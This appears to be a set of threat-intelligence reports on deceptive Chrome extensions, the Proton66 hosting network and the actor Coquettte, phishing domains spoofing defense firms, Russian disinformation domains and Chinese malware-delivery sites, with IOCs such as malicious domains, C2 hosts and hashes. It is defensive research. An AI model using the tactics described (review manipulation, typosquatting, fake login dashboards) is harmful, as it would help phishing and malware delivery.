Like any garden, the digital landscape experiences the emergence of unexpected blooms. Among the helpful flora of browser and application extensions, some appear with intentions less than pure. These deceptive ones, often born from a fleeting desire for illicit gain or mischievous disruption, may possess a certain transient beauty in their ingenuity. They arrive, sometimes subtly flawed in their execution, yet are driven by an aspiration to infiltrate our digital lives, to harvest our data, or to simply sow chaos.

We see them not in complete, monolithic forms, but in their evolving iterations. A small crack in their initial design might be patched in the next update, a vulnerability exploited and then hastily concealed. Their existence is a dance of adaptation, a response to the ever-watchful gaze of security systems. They are, in a sense, perfectly imperfect – their flaws often intertwined with the very mechanisms that allow them to function, however briefly.

On the other side of this digital ecosystem reside the forces of security and risk awareness. These are the gardeners, constantly tending to the health of the digital space, pruning away the harmful growths. Security measures, with their own imperfections and constant striving for improvement, represent the human desire for safety and control. Risk, then, is the shadow cast by these deceptive extensions, a reminder of the potential cost of their transient existence – the loss of privacy, the compromise of personal information, the erosion of trust in the digital tools we rely upon.

The human experience at the heart of this is one of vulnerability and resilience. We, the users, navigate this landscape, often unaware of the subtle battles being waged. We place our trust in the extensions we install, hoping for enhanced functionality or convenience. When that trust is betrayed by a deceptive app or extension, it leaves a mark, a subtle crack in our digital confidence. 

This story is a reminder that the digital world, like the natural one, is in constant flux, and our experience within it is shaped by this delicate and ever-shifting balance between aspiration and risk, between the fleeting beauty of innovation and the enduring need for security.

Browser Extensions’ Security Risk

Browser extensions can pose a security risk to individuals and organizations. Data from the user’s browser or inputs to the extensions can be sent to third parties who may not practice effective security measures to protect user data and privacy. This report highlights a network of approximately 20 newly registered websites intended to lure people to install new browser extensions from the Google Store. The domains and extensions were likely created by a single author, which exhibit patterns of deceptive practices and potential security risks. While the extensions do not display overtly malicious behavior, their design choices raise concerns regarding user privacy and data security.

The Network and Its Characteristics:

The extensions, available on the Google Chrome Web Store, share several common traits:

Manipulated Ratings: All extensions employ a deceptive rating system, funneling positive reviews to the Chrome Web Store while discarding negative feedback.

External Data Transmission: Some extensions, particularly those offering AI-powered features, transmit user data to domains owned by the author. This includes chat history, input data, and potentially sensitive information.

Misleading Branding: Certain extensions use misleading branding, falsely associating themselves with well-known services (e.g., "DeepSeek AI").

Functional Diversity: The extensions offer a range of functionalities, including AI writing and ad creation tools, URL shortening, PDF to JPG conversion, and AI chatbots.

Security Researcher's Guide: Investigating Suspicious Browser Extensions:

Investigative Steps:

• Initial Observation:
  • Note the extension's stated functionality and its perceived utility.
  • Examine user reviews for consistency and authenticity. Be wary of overwhelmingly positive reviews with limited negative feedback.
  • Record the developer's name and any associated websites or domains.
• Extension Retrieval:
  • Obtain the Extension ID: Locate the extension on the Chrome Web Store or via a URL from a website directing to download the extension
  • Download the Extension: Use a tool like chrome-stats[.]com to download the extension's .crx file.
  • Unpack the Extension: One method is to use a file archiving tool (e.g., 7-Zip) to extract the contents of the .crx file.
• Analyze the Files:
  • Examine the manifest.json file for permissions requests and service worker details. Pay attention to permissions that seem excessive for the extension's stated functionality.
  • Analyze Javascript files for suspicious code, external API calls, and data transmission patterns. Look for obfuscated or unusual code that may warrant further investigation.
  • Review the Domains: Research the domains that the extension uses, and be suspicious of generic or unknown domains. Assess the domain's registration information, hosting provider, and overall reputation.
• Data Flow Assessment:
  • Identify the types of data being transmitted and the purpose of the transmission. Evaluate the security and privacy implications of the data transmission.

Examples:

An interested user might see the reviews are 4.8 stars and at least 1,000 users. Not an insubstantial number given the recent global proliferation of DeepSeek AI related apps in the past few months.

A closer look at the reviews shows 4 ratings.

‍

‍

The extension's core functionality involves capturing user input and the entire ongoing chat history, then transmitting this data to an external server (ai-chat-bot.pro) with every message sent by the user. This presents a significant privacy risk, as potentially sensitive conversation data is processed by an unverified third party.

Common among all the observed extensions by this author is code that includes a rating widget that actively filters user feedback. Users providing low ratings (1-3 stars) are redirected to a private feedback form on the ai-chat-bot[.]pro domain, while users providing high ratings (4-5 stars) are sent to the official Chrome Web Store (CWS) review page. This artificially inflates the extension's public rating and violates CWS policy.

A background script directs users to pages hosted on the same suspicious ai-chat-bot[.]pro domain upon extension installation (welcome page) and sets it as the target URL upon uninstallation. This allows the external server to track install/uninstall events.

The code opens a new tab that loads the following page:

This page then sets multiple Yandex tracking cookies without permissions and retrieves browser information from the user.

Even without overtly malicious intent, the observed review manipulation and external transmission of the user’s IP, browser information and associated chat history raise concerns. This grants the website owner access to sensitive user interactions, a potentially serious issue given the increasing data leakage associated with AI productivity tools. The rapid adoption of AI integrations, facilitated by accessible browser extensions, can lead to a gradual erosion of security practices as users develop a false sense of trust. This "out of sight, out of mind" mentality risks exposing sensitive data, such as code, personal searches, and AI chatbot inputs, to malicious third parties who may engage in eavesdropping, data selling, or exploitation.

Looking For More: Domain Registration Patterns

• IP Resolved: 164.90.199[.]205
• IP ISP: DigitalOcean LLC
• Use Yandex Trackers: 99419511 / 99794673 / 99764413
• Registrar: Porkbun LLC
• SSL Issuer: R10 /  R11
• NameServer Domain: messagingengine[.]com
• Server Type: Apache/2.4.52 (Ubuntu)
• MX Domain: messagingengine[.]com

‍

	Domain: ai-sentence-rewriter[.]com Extension Name: ai-sentence-rewriter Extension ID: ihdnbohcfnegemgomjcpckmpnkdgopon
	pdf-to-jpg[.]app Extension Name: convert-pdf-to-jpg Extension ID: oeefjlikahigmlnplgijgeeecbpemhip
	Domain: htmlvalidator[.]app Extension Name: html-validator Extension ID: aofddmgnidinflambjlfkpboeamdldbd
	Domain: email-checker[.]pro Extension Name: email-checker-verify-emai Extension ID: eheagnmidghfknkcaehacggccfiidhik
	Domain: u99[.]pro Extension Name: link-shortener Extension ID: oliiideaalkijolilhhaibhbjfhbdcnm

‍

AI Slop

"AI Slop" refers to low-quality, often generic and repetitive content, including text and images, generated by artificial intelligence, indicating a lack of human oversight and effort. In this case, the presence of many uniformly structured websites, each with minimal, repetitive content and duplicated code across their associated browser extensions, may suggest it is the product of AI Slop. The generic stock imagery, boilerplate text, and superficial explanations of extension functionality, align with the definition, indicating a potential reliance on automated AI generation rather than thoughtful development.

A Surge in AI Slop

Continuing our exploration of the digital landscape, we now see a new element stirring the garden: a surge of growth we might call "AI Slop." This refers to the rapidly increasing volume of apps and extensions, often born with the assistance of artificial intelligence, that flood the digital stores without the careful cultivation of thoughtful development, particularly around ethical considerations, privacy and security.

This influx amplifies the transient nature of the deceptive Chrome extensions we've discussed. AI tools can accelerate their creation and deployment, leading to a more rapid cycle of appearance, exploitation, and eventual detection. The digital garden becomes overgrown, making it harder to discern the true blooms from the weeds.

Deceptions and user risks over privacy and security we observe in hand-crafted malicious extensions can be magnified in those influenced by AI Slop. While AI can generate code quickly, it might lack the nuanced understanding of security vulnerabilities or the ethical considerations that human developers often bring. This can result in extensions riddled with unintentional flaws that are nonetheless exploitable, or even intentionally deceptive features woven into the code with algorithmic efficiency.

The "aspirations" of these AI-assisted deceptive extensions might be less about ingenious design and more about sheer volume. The ease with which they can be generated lowers the barrier for malicious actors, potentially leading to a flood of mediocre but still harmful extensions aimed at overwhelming users and security systems alike. The digital storefronts become crowded marketplaces where discerning genuine value from deceptive imitation becomes an increasingly difficult task for the average user.

The human experience is significantly impacted by this AI Slop. Users, already faced with a bewildering array of choices, are now confronted with an even greater volume of extensions and apps, many of them indistinguishable from legitimate options at a glance. The ability to pick the "perfect" extension becomes an exercise in futility, as the sheer quantity dilutes the quality and increases the risk of encountering a deceptive one. This overabundance erodes trust not just in individual extensions and apps, but in the platforms themselves.

The forces of security now face an even greater challenge. The volume and rapid evolution of AI-Slop-driven extensions and apps make detection and mitigation a constant uphill battle. Traditional signature-based approaches struggle to keep pace with the algorithmic generation of new threats. The gardeners of the digital space must now adapt to a landscape where weeds can sprout with unprecedented speed and in overwhelming numbers.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/DeceptiveBrowserExtensions-AISlop

If the community has any additional input, please let us know.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

Deceptive websites hosted on newly registered domains are being used to deliver AndroidOS SpyNote malware. These sites mimic the Google Chrome install page on the Google Play Store.

This research analyzes Proton66, a bulletproof hosting network enabling cybercrime operations, serving as a hub for aspiring cybercriminals. It focuses on threat actor, known as "Coquettte" and their ties to the Horrid hacking group, a loosely organized cybercriminal collective fostering amateur threat actors.

Bulletproof Hosting Networks and Proton66

While researching malicious domains hosted on Proton66, we stumbled upon an intriguing discovery—a fake cybersecurity website, cybersecureprotect[.]com, masquerading as a legitimate antivirus service. However, due to an operational security (OPSEC) failure, this domain left its entire malicious infrastructure exposed. This revelation led us down a rabbit hole into the operations of an emerging threat actor known as Coquettte—an amateur cybercriminal leveraging Proton66’s bulletproof hosting to distribute malware and engage in other illicit activities.

Proton66, a well-known Russian bulletproof hosting provider, has long been a haven for cybercriminals looking to operate with impunity. By investigating cybersecureprotect[.]com, we uncovered a larger network of malicious activity, including credential-stealing malware, keyloggers, and trojans, all distributed through Proton66’s infrastructure. Interestingly, Coquettte’s criminal ventures are not limited to malware. Investigators uncovered other projects operated by this actor that suggest a broad interest in illicit activities. One notable example is a website hosted at meth[.]to, which purports to distribute guides on the manufacture of Methamphetamine, C4/Semtex, flashbangs, napalm, and catalytic converter theft. While the site appears to contain detailed instructions, it remains unclear whether the content is genuinely intended as a resource for criminal activity or if it falls into the realm of dark humor, shock content, or trolling.

This analysis provides a detailed technical analysis of Coquettte’s malware infrastructure, including forensic insights into how their campaigns function, the threat posed by Proton66 as a cybercrime enabler, and a comprehensive list of indicators of compromise (IOCs) that security professionals can use to detect and mitigate related threats.

Proton66 as a Threat Actor Breeding Ground

Proton66 is a Russian bulletproof hosting provider (Autonomous System AS198953) notorious for enabling cybercrime by ignoring abuse complaints. In a 2024 threat intelligence report by Intrinsec, researchers identified Proton66 as a key player in the bulletproof hosting arena, facilitating illicit online activities such as malware distribution and phishing campaigns. What sets Proton66 apart is its appeal to less-experienced threat actors; its services allow even amateur hackers to host malicious content with impunity. Many phishing and credential-harvesting sites on Proton66 impersonate major brands (e.g. AT&T, Netflix, GoDaddy, banks, crypto exchanges, and government portals) to steal user data. These operations often exhibit poor OPSEC, indicating the operators are relatively inexperienced.

Example of malicious domains:

Threat Actor “Coquettte” and Their Malware Infrastructure

One emerging threat actor thriving in the Proton66 ecosystem goes by the handle “Coquettte” (note the triple “t”). Coquettte appears to be an amateur cybercriminal leveraging Proton66’s services to deploy malware under the guise of legitimate software. Investigators first uncovered Coquettte’s activities through the domain cybersecureprotect[.]com, a fake cybersecurity product site hosted on Proton66. The website pretended to offer “CyberSecure Pro” antivirus software, but due to an OPSEC failure, its web directory was left publicly accessible – revealing the malicious files within.

The directory contained a compressed zip file (CyberSecure Pro.zip) of a Windows Installer - CyberSecurePro.msi, which is actually the malware droppers rather than security software. When executed, the install reaches out to two hard coded URLs: cia[.]tf and quitarlosi[.], downloads a second-stage payload and drops additional executables from the threat actor controlled servers.

Analysis of the retrieved payload revealed that it was flagged as Rugmi (also known as Penguish or associated with the Amadey loader) – a modular malware loader commonly used by cybercriminals to deploy various secondary payloads such as infostealers, trojans, and ransomware. The specific SHA-256 hash of the Rugmi-infected installer was:
a07c9275d2628f6dee9271452a66683831d21367a63cdb61ade0fac55f3ed9ff (CyberSecure Pro[.]zip).

Execution Flow of the Malware:

• Compressed Archive: CyberSecure Pro[.]zip (SHA-256: a07c9275d2628f6dee9271452a66683831d21367a63cdb61ade0fac55f3ed9ff)
• Windows Installer Dropper: CyberSecure Pro.msi (SHA-256: 5558b04220e017f2a69fd88c575ec9450bde361049e42fd67501a0f89ba21834)
• Dropped Files: Upon execution, the .msi file extracts additional payloads, including:
  • CyberSecureV.exe (SHA-256: 0983d99e87d9300d4a1b54c08d9a365160e406e4cd681bfd6ef82052d932a5b4) and stapelia.exe (SHA-256: 1487a4f637a68a5b1dadc379e770431d591421218818164add86c02853a433aa)  – Identified as Trojan.Rugmi/Penguish, a loader trojan used to deliver infostealers such as Lumma Stealer, Vidar, RecordBreaker, and Rescoms.
  • Configuration scripts and batch files to maintain persistence and execute additional payloads.

Trojan.Rugmi/Penguish’s Role in the Attack:
Rugmi/Penguish is a malware loader designed for stealthy payload delivery. It typically:

• Fetches additional malware (infostealers, trojans) from attacker-controlled servers.
• Evolves its delivery tactics, often used in conjunction with cracked software or fake security products.
• Uses obfuscation techniques to bypass antivirus detection.
• Communicates with C2 servers, like cia[.]tf, to receive commands and drop additional payloads.

Coquettte’s personal website, coquettte[.]com, provided additional insights into their online presence. The site, hosted on AWS, at one point displayed a message stating “18 years old software engineer, pursuing a degree in Comp Sci.” This suggests that Coquettte is a young individual, possibly a student, which aligns with the amateurish mistakes (like the open directory) in their cybercrime endeavors.

Further investigation revealed that the cia[.]tf domain, which was used as a malware command-and-control (C2) server, was registered with the email address root[@]coquettte[.]com. This direct link confirmed that Coquettte not only operated cybersecureprotect[.]com as a malware distribution hub, but also controlled cia[.]tf, which facilitated the downloading and execution of malware payloads. By analyzing registration records and domain relations, researchers identified additional infrastructure linked to Coquettte, indicating a broader cybercriminal operation that leveraged Proton66’s bulletproof hosting to persist despite takedown efforts.

Additional Malicious Activities by Coquettte

Interestingly, Coquettte’s criminal ventures are not limited to malware. Investigators uncovered other projects operated by this actor that suggests a broad interest in illicit activities. One notable example is a website hosted at meth[.]to – which, as the name implies, contains how-to guides for illegal substances and weapons.

The site allegedly provides (unverified) recipes and instructions for manufacturing methamphetamine, making explosives like C4/Semtex, constructing improvised devices (e.g. flashbangs, napalm), and even guides on catalytic converter theft. In essence, it functions as an illicit knowledge base or black-market tutorial site. The presence of such content indicates Coquettte (or their associates) are dabbling in the darker corners of cybercrime beyond just malware – potentially trying to run or contribute to an underground marketplace or forum for criminal activities.

Affiliated or Associated Hacking Groups: Horrid[.]xyz and Other Connections

Further analysis of Coquettte’s infrastructure suggests potential ties to a broader hacking group or collective operating under the name “Horrid.” A domain linked to Coquettte, horrid[.]xyz, was registered by the same group and appears to be part of their extended ecosystem. Several other domains associated with their infrastructure include:

• terrorist[.]ovh
• meth[.]to
• meth[.]su

Both meth[.]to and meth[.]su hosted identical content, purporting to distribute guides on illicit activities, while terrorist[.]ovh was similarly structured. The pattern of overlapping infrastructure suggests that the individuals behind these sites may refer to themselves as “Horrid,” with Coquettte being an alias of one of the members rather than a lone actor.

Additionally, a Google Analytics tracker (G-RPK032CCFZ) embedded in some of their sites was linked across at least four domains, further confirming shared ownership:

• horrid[.]xyz
• terrorist[.]ovh
• meth[.]to
• meth[.]su

These interconnections reinforce the likelihood that “Horrid” operates as a small, loosely structured hacking collective rather than a single individual. The group's affiliation with multiple domains tied to cybercrime and illicit content suggests that it functions as an incubator for inspiring or amateur cybercriminals, providing resources and infrastructure to those looking to establish themselves in underground hacking circles.

Additional Online Presence and Linked Accounts

Beyond their own hosted infrastructure, Coquettte and their associates have left digital footprints across multiple platforms. Several of these accounts were referenced directly on coquettte[.]com in a file titled Contact_me.txt, listing the following links:

• GitHub: github[.]com/coquettte – Personal GitHub repository, potentially containing malware-related code or past projects.
• YouTube: youtube[.]com/@uid4 – (also has the alias “chickenwing_11”) Possible media or tutorial content associated with the group, which may serve to share tactics with aspiring cybercriminals.
• Last.fm Profile: last[.]fm/user/chickenwing_11 – While less directly relevant, this could be a personal account linked to the actor.

Additionally, some of their own infrastructure was self-referenced in Coquettte’s personal website (coquettte[.]com) in a file titled other_projects.txt, which listed:

• Meth[.]to: (https://meth[.]to/) – A site purporting to distribute guides on illicit activities.
• Cia[.]tf: (https://cia[.]tf/) – A malware hosting and C2 domain frequently observed in cybercriminal activities.
• Xn--xuu[.]ws: (https://xn--xuu[.]ws/) – A site that emulates a Linux terminal, which uses code from a community project mercurywork[.]shop, further linking their infrastructure to additional cyber-related projects.

The presence of direct self-references across multiple sites reinforces the interconnected nature of these domains, confirming a shared infrastructure between Horrid, Coquettte, and cia.tf. More importantly, these platforms appear to act as a launchpad for aspiring cybercriminals, giving them access to malware, hosting solutions, and potentially a network of like-minded individuals willing to collaborate on cyber threats.

Proton66 Cyber Threats: Vigilance Needed Against Emerging Malware and Amateur Actors

Proton66-based threats require vigilance on multiple fronts. While the individual threat actor “Coquettte” may be relatively amateur, the malware they deploy (stealers, keyloggers, etc.) can do serious damage if successful. The combination of a bulletproof hosting haven and accessible malware toolkits lowers the bar for entry into cybercrime, meaning even minor actors can pose a risk to organizations. By staying aware of the Proton66 network’s activities and aggressively monitoring for the IOCs and techniques detailed above, security teams can bolster their defenses against this breeding ground of emerging threats.

IOCs on GitHub

If the community has any additional input, please let us know.

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/Proton66-Coquettte

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

DomainTools Investigations (DTI) identified a large-scale phishing infrastructure heavily focused on defense and aerospace entities with links to the conflict in Ukraine. The infrastructure comprises a small number of mail servers, each supporting a set of domains designed to spoof that of a specific organization. These domains currently host webmail login pages likely intended to harvest credentials from targeted entities.

This activity is not currently attributed to a specific actor, but available evidence indicates this activity is motivated by cyber espionage, with an emphasis on intelligence collection related to the ongoing conflict in Ukraine.

Detection of Phishing on a Spoofed Ukroboronprom Domain

DTI initially identified a likely phishing page hosted on the domain kroboronprom[.]com a domain spoofing Ukroboronprom, Ukraine’s largest arms manufacturer. The phishing page, located at https[:]//kroboronprom[.]com/sso/login?url=/webmail/?homepage, presents a webmail login prompt. The attackers appear to have built the page using Mailu, an open-source mail server software available on GitHub.

Analysis using DomainTools Iris revealed that the kroboronprom[.]com domain was first seen on December 20, 2024, was hosted on GHOSTnet VPS, and displayed the website title “Mailu-Admin | Mailu.” The Iris Pivot Engine identified nine other domains with the same website title, hosted on GHOSTnet VPS, and first seen after December 20, 2024¹.

_{Table 1. Domains Likely Related to kroboronprom[.]com}

These domains were all registered using the registrar Spaceship. A second search² using the Pivot Engine for domains containing a “-” character, registered via Spaceship, hosted on GHOSTnet VPS IP addresses, and first observed after December 20, 2024 revealed three additional domains: 

• space-kitty[.]online 
• stupid-buddy[.]mom 
• hungry-shark[.]sit

Data from urlscan.io (“urlscan”) shows that each of these domains hosts a Mailu webmail login page identical to one seen on kroboronprom[.]com, strongly suggesting they are being used for credential theft.

Iris data showed that, with the exception of scooby-doo[.]xyz, all of these serve as MX domains for mail servers, which support a large set of spoofed domains imitating organizations in the defense, aerospace, and IT sectors. These domains were registered via Spaceship and first observed some time between December 21, 2024 and March 4, 2025. In total, investigation into this activity identified 878 spoofed domains with naming conventions that added or changed a few characters in the targeted entity’s legitimate domain. 

DTI determined how the actor operationalized this infrastructure. However, the most likely scenario involves phishing emails sent to employees of targeted organizations. The actor likely used spoofed domains in the sender field to make the emails appear as if they originated from within the organization. These emails likely contained malicious links or attachments directing recipients to fake webmail login pages designed to steal credentials.

‍

‍_{Table 2. Mail servers and the entities they were likely used to target}

Expanded Domain Analysis: Links to Credential Phishing and Malicious File Distribution

Further analysis of identified infrastructure using urlscan identified four additional domains likely linked to this activity:

• rheinemetall[.]com
• rheinmetall.com[.]de
• ukrtelecom[.]eu
• funky-bober.art

These domains were visually similar to the MX domains identified above and were also hosted on GHOSTnet VPS infrastructure. Another domain, ukrtelcom[.]com, is likely related to this activity based on Whois data overlap with ukrtelecom[.]eu and rheinemetall[.]com. However, at the time of analysis, ukrtelcom[.]com was not hosted on GHOSTnet VPS and did not host a Mailu credential collection page.

In addition to credential phishing, the actor likely used the subdomain cryptshare.rheinemetall[.]com to distribute malicious files. Data from urlscan indicates this subdomain was used to facilitate file distribution between late January and mid-February 2025. Screenshots show the page requesting a password before allowing users to retrieve a file. The subdomain name and password request page refer to Cryptshare, a legitimate secure file retrieval service. DTI cannot confirm how the actor used this subdomain; however, given the available evidence, it was most likely used to deliver malicious files.

Assessment of Cyber Espionage Activity Targeting Defense and Aerospace Sectors

There is insufficient evidence to attribute this activity to a known actor; however, the activity likely has a cyber espionage motivation. DTI makes this assessment with moderate confidence based on the tactics, techniques, and procedures (TTPs) and the heavy focus on the defense and aerospace sectors. 

The focus on spoofing organizations involved in Ukraine’s defense and telecommunications infrastructure further suggests an intent to gather intelligence related to the conflict in Ukraine. Notably, many of the spoofed defense, aerospace, and IT companies have provided support to Ukraine’s military efforts in its conflict with Russia.

IOCs on GitHub

If the community has any additional input, please let us know.

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/PhishingInfrastructure-UAConflict.csv

Iris Search Hashes

¹

U2FsdGVkX1/N26ISOMEKt52j4qVRCFOeOdJm5/SVrHprkuaLnu2BQeUp0P0Kc6qfHvj5jP53SaAxcYJDb48++Vqi4NintEcAPIkll0UFs8Dqv6g+tIbYEPXAR9Yrlkqv5MIad+FOlQ8f26MzOpo/M7Hqo94HE1H63Jj+B+DEHHMQ6nNrWIpiEy4XT6Zo2FHo8wSby4ujxE+xC+G9wp5KlAQxnpiW3NjxO6N0NRwt/Evi88HuqJkaBsiChU45YFRUQ4ssMz6PTRmx0f3r7oWwdg2x+VYe6gewGBmhrSZ+CYh7szWd8XGZ1bkHs3PO/bJoLLkYXugS+pII3U3SHEDxSg==

²

U2FsdGVkX1/Oxch4IdGieQH7IfShNh73KLEDd36UhzMQ42084cwIoGKpsWU0GBGPtg8+Z3ONxs1f6kJufq/vnm2dFC6OYb0EktrRZwhzkyOZDatwnICp9trBVL1Xa1Ep6ZIxAONKhwESx7raSr+qaQv3eTbH263IY49x6aT1i06O2C48+ZIFN06/+K8+2JIB3qRu18qYJvxZ21dsy77VMz3XHgA0210bqp5/8BFbwJB4HcnLKKLNcssqA+CdMgi4IHEoK/dFEBqHjZuPVo11genM2tr89FwcsEMYGfnDc0tZy1O75JMMwVcXc3rugbRLiRehxUSqXrXc9jda0mjM9IDkmgBYIDw28Cp6jRuUf/I=

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

In the digital battlefield of influence operations, domain registrations serve as the foundation for launching disinformation campaigns. Russian state-sponsored actors, such as APT28 (Fancy Bear), APT29 (Cozy Bear), and the Internet Research Agency (IRA), have long relied on strategic domain registrations to impersonate trusted entities, spread propaganda, and conduct cyber-enabled espionage.

Despite efforts to curb the abuse of domain registration services, Russian-aligned threat actors continue to exploit specific registrars, hosting providers, and domain obfuscation techniques to evade detection. This analysis explores historical data, cybersecurity reports, and real-world case studies to uncover the domain registrars favored by Russian disinformation operations and the tactics that make their campaigns so effective.

‍

How Russian Disinformation Actors Use Domains

Disguising Disinformation with Fake News Websites

A core strategy of Russian influence operations is the creation of fake news portals that mimic legitimate media organizations. These sites publish pro-Kremlin narratives, fabricated stories, and distorted news articles, often in multiple languages to target diverse audiences.

Example:

• A 2022 Microsoft report detailed how SEABORGIUM, a Russian state-sponsored group, registered domains mimicking major Western think tanks and media outlets, such as:
  • bloomberg-us[.]com (mimicking Bloomberg)
  • bbcnews[.]site (spoofing BBC News)
  • nato-int[.]org (targeting NATO)

Typosquatting and Homoglyph Attacks

To enhance credibility and fool unsuspecting users, Russian actors frequently engage in typosquatting (registering domains with minor spelling variations) and homoglyph attacks (substituting characters with lookalikes).

Example:

• APT28 (Fancy Bear) used domains like:
  • dnc-email[.]org instead of dnc.org (2016 U.S. election hack)
  • o365-portal[.]net mimicking Microsoft’s login page

Bulletproof Hosting & Fast Flux Networks

Domain registrations alone are not enough—where a website is hosted matters just as much. Russian influence operators often leverage bulletproof hosting providers in Russia, Moldova, and the Netherlands that turn a blind eye to takedown requests.

Fast Flux techniques (where domain IPs frequently change) further complicate tracking efforts, making it difficult for security teams to take down malicious infrastructure.

‍

Which Domain Registrars Do Russian Disinformation Actors Prefer?

Cyber threat intelligence reports from Mandiant, Recorded Future, Microsoft, Graphika, and Spamhaus reveal a pattern of Russian threat actors registering domains with registrars that offer low-cost, privacy-protected, and anonymous domain services.

Commonly Used Registrars

‍

Case Study:

In 2022, security researchers uncovered a Russian disinformation network that registered over 100 fake media domains via Namecheap and Reg.ru, promoting anti-Ukraine narratives in Western countries.

‍

Russian Disinformation Hosting & Infrastructures

Beyond registrars, Russian actors strategically select hosting providers that offer either complete anonymity or jurisdictional protection from Western law enforcement.

• Bulletproof Hosting: These providers ignore abuse complaints and host malware, phishing sites, and fake news portals.
• Cloudflare & Reverse Proxies: Russian threat actors often hide behind Cloudflare to mask their hosting locations.
• Compromised Websites: Instead of registering new domains, Russian operations increasingly hijack legitimate websites to host disinformation.

Example:

• The Secondary Infektion campaign (Graphika, 2020) used compromised WordPress sites across Europe to spread anti-NATO propaganda while avoiding detection.

‍

Emerging Trends: How Russian Actors Are Evolving Their Tactics

As domain registration oversight improves, Russian actors are adapting their methods to maintain their influence.

Aging Domains for Credibility

Instead of launching new domains immediately, Russian disinformation operators are now registering domains months in advance to make them appear more legitimate before deploying them in active campaigns.

Greater Use of Third-Party Resellers

Rather than registering domains directly, Russian actors are purchasing through resellers that operate under major registrars but have weaker oversight policies.

Shift Toward Encrypted & Decentralized Infrastructure

There is growing evidence that Russian-aligned actors are exploring blockchain-based domain name services (e.g., .eth, .crypto) and peer-to-peer hosting to avoid centralized control.

‍

Strategically Registered Domains for Disinformation Campaigns

The use of strategically registered domains is a cornerstone of Russian disinformation campaigns, and despite increased scrutiny, these operations remain highly adaptable. By exploiting privacy-friendly registrars, bulletproof hosting, and emerging technologies, Russian actors continue to manipulate public discourse and influence geopolitics.

As cyber defenders, journalists, and policymakers, it is crucial to stay ahead of these evolving tactics and disrupt their ability to weaponize domain infrastructure for disinformation.

‍

Sign Up For DomainTools Investigations' Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team - available on LinkedIn or email.

This report dives deeper into activity relating to the previously reported cluster of Chinese Malware Delivery domains. Spoofed download websites of many common applications were observed collecting user information and delivering malware to Chinese speaking users.

Details

This report examines a second cluster of over 1100 domains suspected to have been registered by the same group between April 2024 to January 2025.

Cluster 1: The previously reported Chinese Malware Delivery domains appeared dedicated to malware delivery with minimal dynamic content or obfuscation employed. Primarily delivers Windows backdoors and info stealers. Minimal variability in HTML and JavaScript code.

Cluster 2: Suspected to be broadly focused on user data collection and selective malware delivery. Websites employ highly variable and obfuscated JavaScript files and multiple web analytic services. Purport to host binaries for Windows, macOS, iOS, and Android operating systems.

Spoofed Websites

Very similar to Cluster 1, Cluster 2 involves spoofs of many common applications from messenger apps, VPNs, cryptocurrency exchanges, gaming platforms, game emulators, online gambling, web browsers, and multimedia apps.

Below are screenshots of a sampling of the spoofed download websites over the past 60 days:

‍

Domain Registration Details

The majority of the domains identified had common domain registration details:

• Registrar: WebNIC Support
• Server Type: Nginx, Cloudflare, Golfe2
• Nameserver Domains: hndnsv1[.]com, hndnsv2[.]com
• SSL Duration: 90 days

‍

‍

The following heatmap shows the domain registration UTC timestamps for over 1000 domains from April 2024 to January 2025. The horizontal lines show the majority of the registrations occurred during the approximate working times 8 AM to 5 PM for China Time Zone and US East for comparison.

Domain registration times are not strong indicators of location as registrations can be done programmatically at any time. A heatmap of the registrations over time could be used to draw inferences on the normal operating times, volume and fluctuations of a threat group. One inference is that the actor commonly registers domains in bulk of 10 to 20 domains. Another is domain registrations continued steadily through recent US holidays of Thanksgiving, Christmas and New Years but made no new domain registrations from January 23 to February 8. The gap in domain registrations approximates to a week prior to and through Chinese New Year celebrations (January 29th - February 4th).

Based on a sampling of the 1200+ actor domains for domain registration costs, the cheapest registrations ranged from approximately $5 to $11 USD. Estimates based on these approximations suggest the actor may have spent over $6,000 in the past 10 months on domain registrations alone.

User Data Collection

Spoofed download websites were observed importing highly obfuscated JavaScript files. Their primary purpose appears to be to collect user data. Data is sent to one or more web analytic services. Primarily using Google Tag Manager (GTM), 51.LA and Baidu. A possible reason for using both a Chinese site analytics tracker and non-Chinese site analytic services is to improve data collection from users in and outside of China.

Typical data observed being collected:

Data collected include the following information about users in addition to setting cookies to potentially allow the tracking of users more long-term tracking across different websites.

• IP addresses.
• Browser type and version.
• Operating system.
• Screen resolution.
• Referring website.
• Pages visited and time spent on each page.
• Geographic location (based on IP address).

Some websites were observed loading a js-sdk-recorder.min.js file and may attempt to screen record the browser session.

User browser data is collected and checks are performed to include looking for specific browser types and operating system.

The following are trackers extracted from the spoofed download sites and are suspected to be associated with the actor.

‍

SEO Poisoning and Traffic Generation

Creating thousands of websites and using SEO tactics could be aimed at increasing the site’s search ranking to appear higher in search results than legitimate sources. This can drive traffic to other malicious sites.

Fake Login Dashboards to Deliver Malware

The actor employs several websites themed as merchant backend management dashboards, payment services, crypto exchanges, email, and office applications. It is suspected that links to the fake login sites are distributed via phishing and similar means with the credentials shared to recipients. A mix of English and Chinese language use on the fake login websites and a common theme of merchant and payment backend management applications suggests the actor may be targeting English speaking individuals doing business in China.

Website Title: “Login | Upcube - Admin & Dashboard Template”

UPCUBE 商户后台管理 (“Merchant backend management”)

The sites were observed hard coding the credential validation checks in the HTML login forms such as the following example seen from malicious domain: “otpaycn[.]com”.

Upon Logging into the fake Merchant Backend Dashboard, the following index page is loaded. 

The only functional element is the Home Page at the top of the left panel. Clicking the Home Page loads an image in the center of the page that presents itself as a warning banner with a “Confirm” button. Clicking anywhere on the image initiates a download for a malicious dropper file that upon execution runs ValleyRAT on the system and downloads several modules from an Amazon S3 bucket providing additional functionality.

The image roughly translates to the following:

“VPN Usage Reminder Network connection failed, please use the dedicated network VPN It has been detected that your browser is missing the necessary VPN plug-in. Some functions cannot be used normally. Please update this function version first; if you choose to stop updating, you will not be able to use this function normally. What are the risks and how should I choose Confirm.”

‍

Malware

